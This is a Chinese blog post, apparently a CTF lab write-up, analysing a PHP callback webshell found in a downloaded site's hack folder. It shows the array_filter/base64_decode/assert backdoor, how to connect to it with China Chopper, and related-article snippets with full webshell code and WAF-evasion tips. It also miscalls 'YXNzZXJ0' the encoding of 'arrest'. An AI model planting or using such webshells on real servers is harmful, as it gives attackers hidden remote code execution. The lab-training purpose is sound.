墨者学院 - WebShell代码分析溯源(第4题)

最新推荐文章于 2022-11-29 10:45:44 发布
最新推荐文章于 2022-11-29 10:45:44 发布
阅读量670 收藏
点赞数
分类专栏: webshell Mozhe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42357070/article/details/81364039
版权

唉让我如此信任的工具在这道题上栽了跟头。。。嗯,以后的结果仅供参考。

 

下载源代码,在hack文件夹下发现bin.php

打开分析代码得知其为php回调函数类一句话木马

且获得其密码,通过菜刀连接

菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0
密码为POST

array_filter()函数用回调函数过滤数组中的值,传入$e的参数为YXNzZXJ0(arrest的base64加密值为YXNzZXJ0)

这样回调函数名就是assert,构成一句话木马     assert($_POST['密码'])

POST为密码

array_filter()函数,用回调函数过滤数组中的值
base64_decode()函数,对base64编码的data进行解码

 

 

<?php
    error_reporting(0);
    $e=$_REQUEST['e'];
    $arr=array($_POST['joker'],);
    a
最低0.47元/天 解锁文章
多崎巡礼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院思路之电子数据取证-流量分析(第1)+wireshak导出图片、视频等文件
伪娘+
04-04 1458
墨者学院思路之电子数据取证-流量分析(第1) +wireshak导出图片、视频等文件 背景介绍 某web安全工程师在网络中捕获到一段可疑流量,发现有人将机密数据隐藏在图片中传输了出去,你能分析出其中的奥秘吗? 实训目标 1、掌握“wireshark”的基本使用方法; 2、了解数据在网络中传输的过程和协议; 解方向 使用“wireshark”过滤语句过滤流量。 思路:wireshark是分析...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
墨者学院 电子数据取证
zip471642048的博客
05-29 1866
文章目录电子数据取证-流量分析(第1)网络数据分析溯源(攻击者IP) 电子数据取证-流量分析(第1) 网络数据分析溯源(攻击者IP) 查看z1的内容,可以知道z5是执行sql的命令
墨者学院WebShell代码分析溯源(第6)
vergilben的学习日记
04-03 9520
墨者学院WebShell代码分析溯源(第6) 进入环境: 下载并分析源码: 在如上路径中发现pic3.jpg.php,打开如下所示: 图中箭头指的很明显,是一句话木马,需要用到菜刀连接,但是后面很明显与base64有关,所以,我们需要一个指令来让它变成(xxx,一句话木马),思考一下这里应该是个插入语句,我们平常用到的,是eval函数,但我们看一下eval函数的解释: 所以eval函数是无...
墨者学院WebShell文件上传漏洞分析溯源(第4)
m0_66835614的博客
11-29 836
WebShell文件上传漏洞分析溯源(第4)
WebShell文件上传漏洞分析溯源(第4)
weixin_47493074的博客
10-06 722
WebShell文件上传漏洞分析溯源(第4)
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
CTF中WEB——RCE
tomyyyyy
10-31 6027
CTF中WEB——RCE 目录CTF中WEB——RCE相关函数命令执行代码注入绕过方式空格命令分隔符关键字限制长度限制回显无字母、数字getshell异或取反自增实例相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 &lt...
墨者学院-电子数据取证-日志分析(第1)
臭nana的博客
12-20 1007
用记事本(建议使用notepad++)POST /uploads 拿到ip验证拿到key ​
墨者 - WebShell代码分析溯源(第4)
吃肉唐僧的博客
07-12 256
下载文件,找到木马文件 发现一句木马变种 <?php error_reporting(0); $e=$_REQUEST['e']; $arr=array($_POST['POST'],); array_filter($arr,base64_decode($e)); ?> 这句话的意思是,获取url发过来的参数(base64加密过的)保存到$e,菜刀链接密码为POST,ar...
WEBWebShell代码分析溯源(第4)
HAPPY
08-19 1168
查看到可以webshell后定位到源代码:   这个的用法: get网址中传入 ?e=YXNzZXJ0   (arrest的base64加密值为YXNzZXJ0) 菜刀连接用法: http://www.xxx.com/3.php?e=YXNzZXJ0 密码:POST 详解:base64_decode()函数主要用于base64的解码,YXNzZXJ0的base64解码后的结果为...
webshell文件上传漏洞分析溯源(第四)
WEB渗透测试 从入门到萌新
04-07 147
burpsite抓包修改MIME信息 Content-Type 请求的与实体对应的MIME信息 Content-Type: application/x-www-form-urlencoded
墨者学院 - PHP代码分析溯源(第4)
多崎巡礼的博客
08-05 1073
打开发现提示key在根目录,且给出代码 &lt;?php eval(gzinflate(base64_decode(&amp;40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&amp;))); ?&gt;  这是base64加密+压缩的编码 简单方法就是直接把eval改成echo输出 执行&lt;?php echo(gzinflate(base64_decode(‘...
墨者WebShell文件上传漏洞分析溯源(第4)
zr1213159840的博客
12-28 236
首先还是上传一个文件看下网站是什么代码,不出意外,还是PHP 目中提及了使用MIME相关的内容,估计是通过content-type来的,我们可以直接使用bp拦截后修改即可,将原来的muma.jpg修改为如下: 点击上传,成功 使用蚁剑连接 拿到key ...
蚁剑特征性信息修改简单过WAF
leshi182的博客
02-23 298
0x00 前言 针对于蚁剑的特征,对于流量传输中WAF检测的绕过, 打造武器库, 进行合理化的修改,例如请求头的伪造,流量的加密等一些常用功能,这边主要进行 这几部分的修改。 0x01 修改位置 蚁剑代理通道 UA特征伪造 RSA流量加密 0x02 具体操作 1.蚁剑代理通道 蚁剑代理通道设置(前提是必须有这个代理): 2.UA特征伪造 蚁剑默认UA抓包: 主要修改的位置: /modules/request.js 这边主要是推荐百度UA,具体自己可以百度下其他UA,都可以根据需要来进行设置: Mozill
8. php回调后门
weixin_30819163的博客
05-06 147
中国菜刀下载,基于原版中国菜刀优化版20160309. 下载地址: http://pan.baidu.com/s/1jHoJxHW China chopper http://pan.baidu.com/s/1eRxEYjC 下面是收集并整理的各种一句话,带使用方法: 1.php <?php $POST['POST']='assert'; $arr...
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值